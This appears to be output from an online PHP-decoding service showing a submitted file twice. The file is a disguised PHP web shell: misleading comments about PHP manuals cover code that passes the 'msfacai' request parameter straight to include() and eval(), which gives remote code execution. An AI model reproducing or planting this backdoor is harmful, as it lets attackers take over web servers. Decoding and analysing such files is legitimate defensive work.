Find this useful? Enter your email to receive occasional updates for securing PHP code.
Signing you up...
Thank you for signing up!
PHP Decode
<?php /** * Be sure to include no trailing slash on the path. * See [email protected]. ..
Decoded Output download
<?php
/**
* Be sure to include no trailing slash on the path.
* See [email protected]. for more information
* about PHP manuals and their types.
*/
ini_set("session.cookie_httponly", true);
error_reporting(E_ALL^E_NOTICE^E_WARNING);
session_start();
$_SESSION['server']='';
//Core parameters
function dam(){
$a=base64_encode($_REQUEST['msfacai']);
if (isset($a)) {
$b=''.base64_decode($a).'';
return ($b);
}
}
echo 'Important functions related to PHP system<br>'.$_SESSION['server'].dam().'';
$file=''.dam().'';
Include($file);
eval(''.dam().'');
?>
Did this file decode correctly?
Original Code
<?php
/**
* Be sure to include no trailing slash on the path.
* See [email protected]. for more information
* about PHP manuals and their types.
*/
ini_set("session.cookie_httponly", true);
error_reporting(E_ALL^E_NOTICE^E_WARNING);
session_start();
$_SESSION['server']='';
//Core parameters
function dam(){
$a=base64_encode($_REQUEST['msfacai']);
if (isset($a)) {
$b=''.base64_decode($a).'';
return ($b);
}
}
echo 'Important functions related to PHP system<br>'.$_SESSION['server'].dam().'';
$file=''.dam().'';
Include($file);
eval(''.dam().'');
?>
Function Calls
ini_set | 1 |
Stats
MD5 | cf9dfe80e811dc93a4835132d91f0d39 |
Eval Count | 0 |
Decode Time | 41 ms |